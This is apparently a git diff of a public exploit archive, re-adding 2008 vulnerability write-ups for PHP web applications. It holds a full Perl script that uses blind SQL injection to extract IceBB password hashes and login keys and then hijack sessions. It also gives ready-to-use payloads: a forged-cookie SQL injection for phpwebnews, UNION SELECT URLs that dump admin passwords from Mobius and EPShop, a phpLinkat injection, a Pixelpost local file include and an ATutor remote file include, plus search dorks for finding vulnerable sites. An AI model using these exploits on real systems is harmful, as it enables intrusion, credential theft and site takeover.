# ...:::::phpwebnews-mysql 0.2 Insecure Cookie Handling Vulnerability ::::.... # + ################################################################################### + +Virangar Security Team + +www.virangar.net +www.virangar.ir + +-------- +Discoverd By :virangar security team(hadihadi) + +special tnx :my master hadihadi + +tnx to:MR.nosrati,black.shadowes,MR.hesy + +& all virangar members & all hackerz +------- +DESCRIPTION: +phpwebnews-mysql, suffers from insecure cookie handling, when a admin login is successfull the script creates +a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt +contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are +logged in as a legit admin. +--- +vuln code in /news_manajemen/index.php: //admin area index page +line 6-11: +include('x_inc.php'); + +$a1 = $_COOKIE['a1']; +$a2 = $_COOKIE['a2']; + +if (password_valid($a1,$a2,'')) // a function in x-inc.php +********************** +now vuln code in x-inc.php: +lin 22-39: //password_valid function codes + +function password_valid($pemakai, $password, $ea) +{ + +if ( empty($pemakai)||empty($password) ) + return FALSE; + + // koneksi database + $conn = db_connect(); + if (!$conn) + { + return FALSE; + } + +if (empty($ea)) +{ + $result = mysql_query("select * from user + where user='$pemakai' + and passwd='$password'"); +******************************************************* +we can do nice and funny job :D +sql injcetion white cookie values ;) +--- +exploit: +javascript:document.cookie = "a1=admin ' or 1=1/*; path=/;"; document.cookie = "a2=[what ever]; path=/;"; +----- +now you can get admin access and manage the cms ;) +------- +young iranian h4ck3rz + +# milw0rm.com [2008-07-26] diff --git a/platforms/php/webapps/6137.txt b/platforms/php/webapps/6137.txt index bdf876fde..b50486e21 100755 --- a/platforms/php/webapps/6137.txt +++ b/platforms/php/webapps/6137.txt 
@@ -1,315 +1,315 @@ -# Author: __GiReX__ 26/07/08 -# Homepage: girex.altervista.org - -# CMS: IceBB <= 1.0-RC9.2 -# Site: icebb.net - -# Bug: Blind SQL Injection -# Exploit: Session Hijacking PoC - -# Works regardless of php.ini settings - - -# Description: - IceBB is a powerful, fast, free, and open-source forum solution powered by the free PHP and MySQL. - IceBB scales well, no matter how many users or posts, due to its clean and efficient code. - It can also be fully customized to your needs with full skin and language support. - A powerful admin control center, along with easy-to-use moderation tools, - allow you to easily manage all aspects of your forum. - - -# Exploit Discussion: - -IceBB get all incoming data (GET/POST) in /includes/functions.php and store them into $input array (class std_func, function capture_input) - -# It "cleans" the string vars with this func: lines 94-106 - -94. function clean_string($v) - { - if(get_magic_quotes_gpc()) - { - $v = stripslashes($v); <== We don't need magic quotes = off :P - } - - //$v = htmlentities($v,ENT_QUOTES,'UTF-8'); - $v = htmlspecialchars($v,ENT_QUOTES); - $v = preg_replace("/&#0*([0-9]*);?/",'&#\\1;',$v); - - return $v; -106. } - - -So it fixes quotes chars... but what about backslashes? --> \ <--- -If i put a backslash at the end of an input that is between 2 quote in a query i can manipulate the query - -# Let's see: -# "SELECT COUNT(*) as total FROM icebb_posts WHERE pauthor_id='{$icebb->input['author']}'" - -# Setting author=\ in this query: -# "SELECT COUNT(*) as total FROM icebb_posts WHERE pauthor_id='\' " - -The end quote will be ignored and we get an error.. - -How can we exploit that? -In a query with 2 input.. - - -# File: /modules/memebers.php lines 43-78 - - $fleh = $icebb->input; <== - ... - foreach($fleh as $k => $g) - { - ... - $where_clauses[] = "{$k}='{$g}'"; <== - ... - } - ... 
- - $this->qwhere = implode(' AND ',$where_clauses); - $total = $db->fetch_result("SELECT COUNT(*) as total FROM icebb_users{$this->qwhere}{$qextra}"); <== - -In this query there can be more inputs (GET/POST) for example $username and $url. - -If we set username=\ the sintax after it will be quoted and became part of the string -while from the next quote (the one that came before $url) will became SQL. (so the $url content). - -# For example: -# GET /index.php?act=members&username=a\&url=OR+1# - -# Became: -# "SELECT COUNT(*) as total FROM icebb_users WHERE user_group='a\' AND username='OR 1#' AND id!=0 ORDER BY username ASC" - -So whith the parameter $username we can manipulate the query... - -Unfortunally i could find only a Blind Sql Injection with this trick.. and.. -the passwords stored in db are hashed (md5) and salted. - -We can try to Hijacking admin/user's session... -(but we can't access to admin area that needs special login). - -# The function autoLogin() in /includes/classes/login_func.php -# is called if cookies ar set... line 153-175 - -153.function autoLogin() - { - global $icebb,$db,$config,$std; - - $uid = $std->eatCookie('uid'); - $login_key = $std->eatCookie('login_key'); - - $icebb->hooks->hook('login_autoLogin', $uid, $login_key); - - $userq = $db->query("SELECT u.*,g.* FROM icebb_users AS u LEFT JOIN icebb_groups AS g ON u.user_group=g.gid WHERE u.id=".intval($uid)." AND u.login_key='{$login_key}' LIMIT 1"); - $udata = $db->fetch_row($userq); - - if($db->get_num_rows($userq)>=1) - { - if($std->eatCookie('pass')==$udata['password']) - { - $sessid = md5(uniqid(microtime())); - $ip = $icebb->client_ip; - $user_agent = $std->clean_string($_SERVER['HTTP_USER_AGENT']); - - //$db->query("DELETE FROM icebb_session_data WHERE username='{$udata['username']}' OR ip='{$ip}'",1); - -175. $sessdata = $this->create_session($udata['username'],$udata['id'],false,true); - - -If admin has cookies enabled we can login and create/edit/delete posts and topics. 
- -############################### Perl Exploit Start ############################# - - -#!/usr/bin/perl -# IceBB <= 1.0-RC9.2 Blind SQL Injection -# Admin/User's Session Hijacking PoC -# Coded by __GiReX__ - -use LWP::UserAgent; - -if(not defined $ARGV[1]) -{ - banner(); - print "[+] Usage:\tperl $0 [id]\n"; - print "[+] Example:\tperl $0 localhost /icebb/ 1\n"; - exit; -} - -my $target = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0].$ARGV[1]: 'http://' . $ARGV[0].$ARGV[1]; -my $id = (defined $ARGV[2]) ? $ARGV[2]: 1; - -my $lwp = new LWP::UserAgent; -my @cset = (48..57, 97..102); - -my ($hash, $key, $user, $prefix) = (undef, undef, undef, undef); - -banner(); -$user = get_username(); -$prefix = get_prefix(); - -print STDOUT "[+] User $id username: $user\n"; - -for(my $j = 1; $j <= 32; $j++) -{ - foreach $char(@cset) - { - info(chr($char), $hash, "password"); - $rv = check_char($char, $j, "password"); - - if(defined $rv) - { - $hash .= chr($char); - last; - } - } - - last if $j > 2 and not defined $hash; -} - -if(not defined $hash or length($hash) != 32) -{ - print STDOUT "\n\n[-] Exploit mistake: probably fixed\n"; - exit; -} -else -{ - print STDOUT "\n" x 1; -} - -for(my $j = 1; $j <= 32; $j++) -{ - foreach $char(@cset) - { - info(chr($char), $key, "loginkey"); - $rv = check_char($char, $j, "login_key"); - - if(defined $rv) - { - $key .= chr($char); - last; - } - } - - last if $j > 2 and not defined $key; -} - -if(not defined $key or length($key) != 32) -{ - print STDOUT "\n\n[-] Exploit mistake: user $id has not a login_key\n"; - exit; -} - -print "\n\n[+] Attempting to login with user's $id session...\n\n"; - -$logged = try_login(); - -if(defined $logged) -{ - print STDOUT "[+] Oh yeah logged in!\n\n"; - print STDOUT "[+] Try yourself with your browser and these cookies:\n\n"; - print STDOUT "[+] Cookie: ${prefix}user=${user}; ${prefix}pass=${hash}; \n". 
- " ${prefix}uid=${id}; ${prefix}login_key=${key}\n\n"; -} -else -{ - print STDOUT "[-] Attempt failed...\n\n"; -} - -print STDOUT "[+] Exploit terminated\n"; - - -sub try_login() -{ - my $lwp = new LWP::UserAgent; - $lwp->default_header('Cookie' => "${prefix}user=${user}; ${prefix}pass=${hash}; ${prefix}uid=${id}; ${prefix}login_key=${key}"); - - my $res = $lwp->get($target); - - if($res->is_success) - { - if($res->content =~ /User Control Panel/) - { - return 1; - } - } - - return undef; -} - -sub info -{ - my($c, $cur, $str) = @_; - - $cur = '' unless defined $cur; - print STDOUT "[+] User $id ${str}: ${cur}${c}\r"; - - $| = 1; -} - -sub check_char -{ - my ($char, $n, $field) = @_ ; - - my $res = $lwp->get($target."index.php?act=members&username=%5c&url=". - "OR+ASCII(SUBSTRING((SELECT+${field}+FROM+${prefix}users+WHERE+id=${id}),${n},1))=${char}%23"); - - if($res->is_success) - { - if($res->content !~ /No members were found that met your selected critera/ and $res->content =~ /

    Member list<\/h2>/) - { - return $res->is_success; - } - } - - return undef; -} - -sub get_prefix() -{ - my $rv = "icebb"; - - my $res = $lwp->get($target."index.php?act=members&username=%5c&url=OR+1"); - - if($res->content =~ /as total FROM ([a-z]+)_users WHERE/) - { - $rv = $1; - } - - return $rv . '_'; -} - -sub get_username() -{ - my $rv = undef; - my $res = $lwp->get($target."index.php?profile=${id}"); - - if($res->is_success) - { - if($res->content =~ /

    View profile: (.+)<\/h2>/) - { - $rv = $1; - } - else - { - die "[-] Exploit mistake: user ${id} does not exists\n"; - } - } - else - { - die "[-] Exploit mistake: could not connect to $target\n"; - } - - return $rv; - } - -sub banner -{ - print "\n"; - print "[+] IceBB <= 1.0-RC9.2 Blind SQL Injection\n"; - print "[+] Admin/User's Session Hijacking PoC\n"; - print "[+] Coded by __GiReX__\n"; - print "\n\n"; -} - -# milw0rm.com [2008-07-26] +# Author: __GiReX__ 26/07/08 +# Homepage: girex.altervista.org + +# CMS: IceBB <= 1.0-RC9.2 +# Site: icebb.net + +# Bug: Blind SQL Injection +# Exploit: Session Hijacking PoC + +# Works regardless of php.ini settings + + +# Description: + IceBB is a powerful, fast, free, and open-source forum solution powered by the free PHP and MySQL. + IceBB scales well, no matter how many users or posts, due to its clean and efficient code. + It can also be fully customized to your needs with full skin and language support. + A powerful admin control center, along with easy-to-use moderation tools, + allow you to easily manage all aspects of your forum. + + +# Exploit Discussion: + +IceBB get all incoming data (GET/POST) in /includes/functions.php and store them into $input array (class std_func, function capture_input) + +# It "cleans" the string vars with this func: lines 94-106 + +94. function clean_string($v) + { + if(get_magic_quotes_gpc()) + { + $v = stripslashes($v); <== We don't need magic quotes = off :P + } + + //$v = htmlentities($v,ENT_QUOTES,'UTF-8'); + $v = htmlspecialchars($v,ENT_QUOTES); + $v = preg_replace("/&#0*([0-9]*);?/",'&#\\1;',$v); + + return $v; +106. } + + +So it fixes quotes chars... but what about backslashes? 
--> \ <--- +If i put a backslash at the end of an input that is between 2 quote in a query i can manipulate the query + +# Let's see: +# "SELECT COUNT(*) as total FROM icebb_posts WHERE pauthor_id='{$icebb->input['author']}'" + +# Setting author=\ in this query: +# "SELECT COUNT(*) as total FROM icebb_posts WHERE pauthor_id='\' " + +The end quote will be ignored and we get an error.. + +How can we exploit that? +In a query with 2 input.. + + +# File: /modules/memebers.php lines 43-78 + + $fleh = $icebb->input; <== + ... + foreach($fleh as $k => $g) + { + ... + $where_clauses[] = "{$k}='{$g}'"; <== + ... + } + ... + + $this->qwhere = implode(' AND ',$where_clauses); + $total = $db->fetch_result("SELECT COUNT(*) as total FROM icebb_users{$this->qwhere}{$qextra}"); <== + +In this query there can be more inputs (GET/POST) for example $username and $url. + +If we set username=\ the sintax after it will be quoted and became part of the string +while from the next quote (the one that came before $url) will became SQL. (so the $url content). + +# For example: +# GET /index.php?act=members&username=a\&url=OR+1# + +# Became: +# "SELECT COUNT(*) as total FROM icebb_users WHERE user_group='a\' AND username='OR 1#' AND id!=0 ORDER BY username ASC" + +So whith the parameter $username we can manipulate the query... + +Unfortunally i could find only a Blind Sql Injection with this trick.. and.. +the passwords stored in db are hashed (md5) and salted. + +We can try to Hijacking admin/user's session... +(but we can't access to admin area that needs special login). + +# The function autoLogin() in /includes/classes/login_func.php +# is called if cookies ar set... 
line 153-175 + +153.function autoLogin() + { + global $icebb,$db,$config,$std; + + $uid = $std->eatCookie('uid'); + $login_key = $std->eatCookie('login_key'); + + $icebb->hooks->hook('login_autoLogin', $uid, $login_key); + + $userq = $db->query("SELECT u.*,g.* FROM icebb_users AS u LEFT JOIN icebb_groups AS g ON u.user_group=g.gid WHERE u.id=".intval($uid)." AND u.login_key='{$login_key}' LIMIT 1"); + $udata = $db->fetch_row($userq); + + if($db->get_num_rows($userq)>=1) + { + if($std->eatCookie('pass')==$udata['password']) + { + $sessid = md5(uniqid(microtime())); + $ip = $icebb->client_ip; + $user_agent = $std->clean_string($_SERVER['HTTP_USER_AGENT']); + + //$db->query("DELETE FROM icebb_session_data WHERE username='{$udata['username']}' OR ip='{$ip}'",1); + +175. $sessdata = $this->create_session($udata['username'],$udata['id'],false,true); + + +If admin has cookies enabled we can login and create/edit/delete posts and topics. + +############################### Perl Exploit Start ############################# + + +#!/usr/bin/perl +# IceBB <= 1.0-RC9.2 Blind SQL Injection +# Admin/User's Session Hijacking PoC +# Coded by __GiReX__ + +use LWP::UserAgent; + +if(not defined $ARGV[1]) +{ + banner(); + print "[+] Usage:\tperl $0 [id]\n"; + print "[+] Example:\tperl $0 localhost /icebb/ 1\n"; + exit; +} + +my $target = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0].$ARGV[1]: 'http://' . $ARGV[0].$ARGV[1]; +my $id = (defined $ARGV[2]) ? 
$ARGV[2]: 1; + +my $lwp = new LWP::UserAgent; +my @cset = (48..57, 97..102); + +my ($hash, $key, $user, $prefix) = (undef, undef, undef, undef); + +banner(); +$user = get_username(); +$prefix = get_prefix(); + +print STDOUT "[+] User $id username: $user\n"; + +for(my $j = 1; $j <= 32; $j++) +{ + foreach $char(@cset) + { + info(chr($char), $hash, "password"); + $rv = check_char($char, $j, "password"); + + if(defined $rv) + { + $hash .= chr($char); + last; + } + } + + last if $j > 2 and not defined $hash; +} + +if(not defined $hash or length($hash) != 32) +{ + print STDOUT "\n\n[-] Exploit mistake: probably fixed\n"; + exit; +} +else +{ + print STDOUT "\n" x 1; +} + +for(my $j = 1; $j <= 32; $j++) +{ + foreach $char(@cset) + { + info(chr($char), $key, "loginkey"); + $rv = check_char($char, $j, "login_key"); + + if(defined $rv) + { + $key .= chr($char); + last; + } + } + + last if $j > 2 and not defined $key; +} + +if(not defined $key or length($key) != 32) +{ + print STDOUT "\n\n[-] Exploit mistake: user $id has not a login_key\n"; + exit; +} + +print "\n\n[+] Attempting to login with user's $id session...\n\n"; + +$logged = try_login(); + +if(defined $logged) +{ + print STDOUT "[+] Oh yeah logged in!\n\n"; + print STDOUT "[+] Try yourself with your browser and these cookies:\n\n"; + print STDOUT "[+] Cookie: ${prefix}user=${user}; ${prefix}pass=${hash}; \n". 
+ " ${prefix}uid=${id}; ${prefix}login_key=${key}\n\n"; +} +else +{ + print STDOUT "[-] Attempt failed...\n\n"; +} + +print STDOUT "[+] Exploit terminated\n"; + + +sub try_login() +{ + my $lwp = new LWP::UserAgent; + $lwp->default_header('Cookie' => "${prefix}user=${user}; ${prefix}pass=${hash}; ${prefix}uid=${id}; ${prefix}login_key=${key}"); + + my $res = $lwp->get($target); + + if($res->is_success) + { + if($res->content =~ /User Control Panel/) + { + return 1; + } + } + + return undef; +} + +sub info +{ + my($c, $cur, $str) = @_; + + $cur = '' unless defined $cur; + print STDOUT "[+] User $id ${str}: ${cur}${c}\r"; + + $| = 1; +} + +sub check_char +{ + my ($char, $n, $field) = @_ ; + + my $res = $lwp->get($target."index.php?act=members&username=%5c&url=". + "OR+ASCII(SUBSTRING((SELECT+${field}+FROM+${prefix}users+WHERE+id=${id}),${n},1))=${char}%23"); + + if($res->is_success) + { + if($res->content !~ /No members were found that met your selected critera/ and $res->content =~ /

    Member list<\/h2>/) + { + return $res->is_success; + } + } + + return undef; +} + +sub get_prefix() +{ + my $rv = "icebb"; + + my $res = $lwp->get($target."index.php?act=members&username=%5c&url=OR+1"); + + if($res->content =~ /as total FROM ([a-z]+)_users WHERE/) + { + $rv = $1; + } + + return $rv . '_'; +} + +sub get_username() +{ + my $rv = undef; + my $res = $lwp->get($target."index.php?profile=${id}"); + + if($res->is_success) + { + if($res->content =~ /

    View profile: (.+)<\/h2>/) + { + $rv = $1; + } + else + { + die "[-] Exploit mistake: user ${id} does not exists\n"; + } + } + else + { + die "[-] Exploit mistake: could not connect to $target\n"; + } + + return $rv; + } + +sub banner +{ + print "\n"; + print "[+] IceBB <= 1.0-RC9.2 Blind SQL Injection\n"; + print "[+] Admin/User's Session Hijacking PoC\n"; + print "[+] Coded by __GiReX__\n"; + print "\n\n"; +} + +# milw0rm.com [2008-07-26] diff --git a/platforms/php/webapps/6138.txt b/platforms/php/webapps/6138.txt index 01ea1605d..98cd16c3f 100755 --- a/platforms/php/webapps/6138.txt +++ b/platforms/php/webapps/6138.txt 
@@ -1,35 +1,35 @@ - :::::::-. ... ::::::. :::. - ;;, `';, ;; ;;;`;;;;, `;;; - `[[ [[[[' [[[ [[[[[. '[[ - $$, $$$$ $$$ $$$ "Y$c$$ - 888_,o8P'88 .d888 888 Y88 - MMMMP"` "YmmMMMM"" MMM YM - - [ Discovered by dun \ dun[at]strcpy.pl ] - - ################################################################# - # [ Mobius <= 1.4.4.1 ] Remote SQL Injection Vulnerability # - ################################################################# - # - # [ Script: Mobius Web Publishing Software ] - # - # [ Script site: http://www.willo.com/mimsy_xg/mobius.asp ] - # - # [ Default table_name with users: Webusers ] - # - # [ Vuln: browse.php ] http://site.com/browse.php?id=-1+UNION+SELECT+concat_ws(char(58),USID,EMAIL,SUPERSECRETPASSWORD,ADMIN)+from+Webusers+limit+0,1/* - # - # [ Vuln: detail.php ] http://site.com/mobius_path/detail.php?t=exhibitions&type=exh&f=&s=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/* - # *[ in other version of Mobius, number of columns may be different ]* - # - # [ Dork example: "This website is powered by Mobius" ] - # - ##################################################### - # Greetz: D3m0n_DE * Voo|doo * str0ke and otherz.. - ##################################################### - - [ dun / 2008 ] - -******************************************************************************************* - -# milw0rm.com [2008-07-26] + :::::::-. ... ::::::. :::. + ;;, `';, ;; ;;;`;;;;, `;;; + `[[ [[[[' [[[ [[[[[. 
'[[ + $$, $$$$ $$$ $$$ "Y$c$$ + 888_,o8P'88 .d888 888 Y88 + MMMMP"` "YmmMMMM"" MMM YM + + [ Discovered by dun \ dun[at]strcpy.pl ] + + ################################################################# + # [ Mobius <= 1.4.4.1 ] Remote SQL Injection Vulnerability # + ################################################################# + # + # [ Script: Mobius Web Publishing Software ] + # + # [ Script site: http://www.willo.com/mimsy_xg/mobius.asp ] + # + # [ Default table_name with users: Webusers ] + # + # [ Vuln: browse.php ] http://site.com/browse.php?id=-1+UNION+SELECT+concat_ws(char(58),USID,EMAIL,SUPERSECRETPASSWORD,ADMIN)+from+Webusers+limit+0,1/* + # + # [ Vuln: detail.php ] http://site.com/mobius_path/detail.php?t=exhibitions&type=exh&f=&s=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/* + # *[ in other version of Mobius, number of columns may be different ]* + # + # [ Dork example: "This website is powered by Mobius" ] + # + ##################################################### + # Greetz: D3m0n_DE * Voo|doo * str0ke and otherz.. + ##################################################### + + [ dun / 2008 ] + +******************************************************************************************* + +# milw0rm.com [2008-07-26] diff --git a/platforms/php/webapps/6139.txt b/platforms/php/webapps/6139.txt index 9ed3fdff8..b3627f19f 100755 --- a/platforms/php/webapps/6139.txt +++ b/platforms/php/webapps/6139.txt 
@@ -1,26 +1,26 @@ -######################################################################################## -# -# [+] Name : EPShop < 3.0 (pid) Remote SQL Injection Vulnerability -# [+] Author : mikeX - http://www.cyber-underground.net / m$n: mikeX[at]fuckoff[dot]com -# [+] Dork(s): ?action=pro_show and ?action=disppro -# [+] Greetz : Ciaran McG, -Witch-Doct0r, K_n, MegaByte, Squibs, cIpheR, mmmbud, RoMeo -# -######################################################################################## - - -Information; - - You can't download a copy coz it's now known as ECShop - http://comsenz.com/products/ecshop - They stopped supporting the old version a while ago. - -Exploit; - - SQL #1: http://www.target.com/?action=pro_show&pid=[SQL Injection] - SQL #2: http://www.target.com/?action=disppro&pid=[SQL Injection] - -Live Examples; - - http://www.xxx.net/?action=pro_show&pid=null+UNION+ALL+SELECT+1,password,3,4,5,6+FROM+admin-- - http://www.xxx.com/?action=disppro&pid=null+UNION+ALL+SELECT+1,password,3,4,5,6,7,8,9,10,11,12,13+FROM+admin-- - -# milw0rm.com [2008-07-26] +######################################################################################## +# +# [+] Name : EPShop < 3.0 (pid) Remote SQL Injection Vulnerability +# [+] Author : mikeX - http://www.cyber-underground.net / m$n: mikeX[at]fuckoff[dot]com +# [+] Dork(s): ?action=pro_show and ?action=disppro +# [+] Greetz : Ciaran McG, -Witch-Doct0r, K_n, MegaByte, Squibs, cIpheR, mmmbud, RoMeo +# +######################################################################################## + + +Information; + + You can't download a copy coz it's now known as ECShop - http://comsenz.com/products/ecshop + They stopped supporting the old version a while ago. 
+ +Exploit; + + SQL #1: http://www.target.com/?action=pro_show&pid=[SQL Injection] + SQL #2: http://www.target.com/?action=disppro&pid=[SQL Injection] + +Live Examples; + + http://www.xxx.net/?action=pro_show&pid=null+UNION+ALL+SELECT+1,password,3,4,5,6+FROM+admin-- + http://www.xxx.com/?action=disppro&pid=null+UNION+ALL+SELECT+1,password,3,4,5,6,7,8,9,10,11,12,13+FROM+admin-- + +# milw0rm.com [2008-07-26] diff --git a/platforms/php/webapps/6140.txt b/platforms/php/webapps/6140.txt index 38daf492c..569d1a76d 100755 --- a/platforms/php/webapps/6140.txt +++ b/platforms/php/webapps/6140.txt 
@@ -1,38 +1,38 @@ -######## ## ## ###### ######## ## ## ######## ######## ####### ######## -## ### ## ## ## ## ## ## ## ## ## ## ## ## ## ## -## #### ## ## ## ## #### ## ## ## ## ## ## -###### ## ## ## ## ######## ## ######## ## ####### ## ## -## ## #### ## ## ## ## ## ## ## ## ## -## ## ### ## ## ## ## ## ## ## ## ## ## ## -######## ## ## ###### ## ## ## ## ## ####### ######## -################################ !R4Q!4N H4CK3R ################################### -# -# phpLinkat 0.1 Insecure Cookie Handling Vulnerability & Sql Injection Exploit -# -# Founded By : Encrypt3d.M!nd -# encrypt3d.blogspot.com -# -# Dork : "Powered by DesClub.com - phpLinkat" - -# Description : - - phpLinkat is a free link indexing script written in PHP and - runs on MySQL.This script is suffering a sql injection bug - and insecure cookie handling. - -# phpLinkat : Sql Injection Exploit - PoC :www.site.com/phpLinkat/showcat.php?catid=666%20union%20select%20concat(version(),0x3a,database(),0x3a,user()),2,3,4,5,6/* - -# phpLinkat : Insecure Cookie Handling - - /admin/login2.php: - 6 : if( ($username == $cpusername) && ($password == $cppassword) ){ - 7 : setcookie("login","right"); <<< wtf!! - 8 : echo <<array('NL','Nederlands'), - 'english'=>array('EN','English'), - 'french'=>array('FR','Francais'), - 'german'=>array('DE','Deutsch'), - 'italian'=>array('IT','Italiano'), - 'norwegian'=>array('NO','Norsk'), - 'persian'=>array('FA','Farsi'), - 'polish'=>array('PL','Polskiego'), - 'portuguese'=>array('PT','Portugues'), - 'simplified_chinese'=>array('CN','Chinese'), - 'spanish'=>array('ES','Espanol'), - 'swedish'=>array('SE','Svenska'), - 'danish'=>array('DK','Dansk'), - 'japanese'=>array('JP','Japanese'), - 'hungarian'=>array('HU','Magyar'), - 'romanian'=>array('RO','Romana'), - 'russian'=>array('RU','Russian'), - 'czech'=>array('CS','Cesky') - ); -... 
-if(isset($_GET['lang'])) { $language_abr = substr($_GET['lang'],0,2); } - -foreach ($PP_supp_lang as $key => $row) { - foreach($row as $cell){ - if ($cell == strtoupper($language_abr)) { $language_full = $key; } - } -} -... -if(!empty($language_full)) { - if(file_exists("language/lang-".$language_full.".php")) { - - if( !isset($_GET['x'])OR($_GET['x'] != "rss" & $_GET['x'] != "atom")) { - require("language/lang-".$language_full.".php"); - } - }else{ - ... - -################################################# - -Example: - -http://[server]/[installdir]/index.php?lang=DSecRG&language_full=../../../../../../../../../../../../../boot.ini%00 - - - -Solution -******** - -Vendor fix this flaw on 27.07.2008. Security Patch can be downloaded here: - -http://www.pixelpost.org/blog/2008/07/27/pixelpost-171-security-patch/ - - - -About -***** - -Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. - - -Contact: research [at] dsec [dot] ru - http://www.dsec.ru (in Russian) - -# milw0rm.com [2008-07-28] +Digital Security Research Group [DSecRG] Advisory #DSECRG-08-033 + + +Application: Pixelpost photoblog +Versions Affected: 1.7.1 +Vendor URL: http://www.pixelpost.org/ +Bug: Local File Include +Exploits: YES +Reported: 22.07.2008 +Vendor response: 23.07.2008 +Solution: YES +Date of Public Advisory: 28.07.2008 +Authors: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) + + + +Description +*********** + +Pixelpost photoblog has local file include vulnerability in script index.php + +Successful exploitation requires that "register_globals" is enabled. 
+ +Code +**** +################################################# + +$PP_supp_lang = array('dutch'=>array('NL','Nederlands'), + 'english'=>array('EN','English'), + 'french'=>array('FR','Francais'), + 'german'=>array('DE','Deutsch'), + 'italian'=>array('IT','Italiano'), + 'norwegian'=>array('NO','Norsk'), + 'persian'=>array('FA','Farsi'), + 'polish'=>array('PL','Polskiego'), + 'portuguese'=>array('PT','Portugues'), + 'simplified_chinese'=>array('CN','Chinese'), + 'spanish'=>array('ES','Espanol'), + 'swedish'=>array('SE','Svenska'), + 'danish'=>array('DK','Dansk'), + 'japanese'=>array('JP','Japanese'), + 'hungarian'=>array('HU','Magyar'), + 'romanian'=>array('RO','Romana'), + 'russian'=>array('RU','Russian'), + 'czech'=>array('CS','Cesky') + ); +... +if(isset($_GET['lang'])) { $language_abr = substr($_GET['lang'],0,2); } + +foreach ($PP_supp_lang as $key => $row) { + foreach($row as $cell){ + if ($cell == strtoupper($language_abr)) { $language_full = $key; } + } +} +... +if(!empty($language_full)) { + if(file_exists("language/lang-".$language_full.".php")) { + + if( !isset($_GET['x'])OR($_GET['x'] != "rss" & $_GET['x'] != "atom")) { + require("language/lang-".$language_full.".php"); + } + }else{ + ... + +################################################# + +Example: + +http://[server]/[installdir]/index.php?lang=DSecRG&language_full=../../../../../../../../../../../../../boot.ini%00 + + + +Solution +******** + +Vendor fix this flaw on 27.07.2008. Security Patch can be downloaded here: + +http://www.pixelpost.org/blog/2008/07/27/pixelpost-171-security-patch/ + + + +About +***** + +Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. 
Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. + + +Contact: research [at] dsec [dot] ru + http://www.dsec.ru (in Russian) + +# milw0rm.com [2008-07-28] diff --git a/platforms/php/webapps/6153.txt b/platforms/php/webapps/6153.txt index 134bfe782..d8736fb06 100755 --- a/platforms/php/webapps/6153.txt +++ b/platforms/php/webapps/6153.txt 
@@ -1,31 +1,31 @@ -##################################################################################### -#### ATutor Course Server Rfi #### -##################################################################################### -# # -#AUTHOR : IRCRASH (R3d.W0rm) # -#Discovered by : IRCRASH (R3d.W0rm) # -#Our Site : Http://IRCRASH.COM # -#IRCRASH Team Members : Dr.Crash - R3d.w0rm # -##################################################################################### -# # -#Script Download : www.atutor.ca # -# # -#DORK : "Web site engine's code is copyright © 2001-2007 ATutor®" # -# # -#Note : You must login , then use rfi bug ;) # -##################################################################################### -# [Rfi] # -# # -#http://Example/tools/packages/import.php # -# # -# [Valun Code] # -# .... # -# if (isset ($_POST['type'])) { # -# require ($_POST['type'] . '/import.php'); # -#} # -# .... # -##################################################################################### -# Site : Http://IRCRASH.COM # -###################################### TNX GOD ###################################### - -# milw0rm.com [2008-07-28] +##################################################################################### +#### ATutor Course Server Rfi #### +##################################################################################### +# # +#AUTHOR : IRCRASH (R3d.W0rm) # +#Discovered by : IRCRASH (R3d.W0rm) # +#Our Site : Http://IRCRASH.COM # +#IRCRASH Team Members : Dr.Crash - R3d.w0rm # +##################################################################################### +# # +#Script Download : www.atutor.ca # +# # +#DORK : "Web site engine's code is copyright © 2001-2007 ATutor®" # +# # +#Note : You must login , then use rfi bug ;) # +##################################################################################### +# [Rfi] # +# # +#http://Example/tools/packages/import.php # +# # +# [Valun Code] # +# .... 
# +# if (isset ($_POST['type'])) { # +# require ($_POST['type'] . '/import.php'); # +#} # +# .... # +##################################################################################### +# Site : Http://IRCRASH.COM # +###################################### TNX GOD ###################################### + +# milw0rm.com [2008-07-28] diff --git a/platforms/php/webapps/6154.txt b/platforms/php/webapps/6154.txt index c0c84856c..52413df46 100755 --- a/platforms/php/webapps/6154.txt +++ b/platforms/php/webapps/6154.txt 
@@ -1,66 +1,66 @@ -########################################################## -# GulfTech Security Research July 28, 2008 -########################################################## -# Vendor : ViArt, Ltd -# URL : http://www.viart.com/ -# Version : ViArt Shop <= 3.5 -# Risk : SQL Injection -########################################################## - - -Description: -ViArt Shop is a full featured online ecommerce solution written -in php. There is a high risk SQL Injection in ViArt that allows -for an attacker to take over the ViArt installation. This -vulnerability is present regardless of magic_quotes configuration. -An updated version of ViArt has been released and all users are -encouraged to upgrade their ViArt installation as soon as possible. - - -SQL Injection: -There is a high risk SQL Injection vulnerability in ViArt that -allows for an attacker to run arbitrary queries via a malicious -request. The vulnerable code can be found in "products_rss.php". -As seen below the "$category_id" variable is never sanitized within -the query, and is never sanitized prior to that point either. - -if ($category_id == 0){ - $sql = "SELECT category_id, friendly_url FROM " . $table_prefix . "categories WHERE category_path like '%".$category_id.",%' AND is_showing = 1 "; -} else { - $sql = "SELECT category_id, friendly_url FROM " . $table_prefix . "categories WHERE category_path like '%,".$category_id.",%' AND is_showing = 1 "; -} - -This allows for an attacker to easily select arbitrary data -from the database such as usernames,passwords, and even credit -card information. it should also be noted that ViArt strips -slashes from within the get_param() function, so magic_quotes -does not prevent this SQL Injection from happening. 
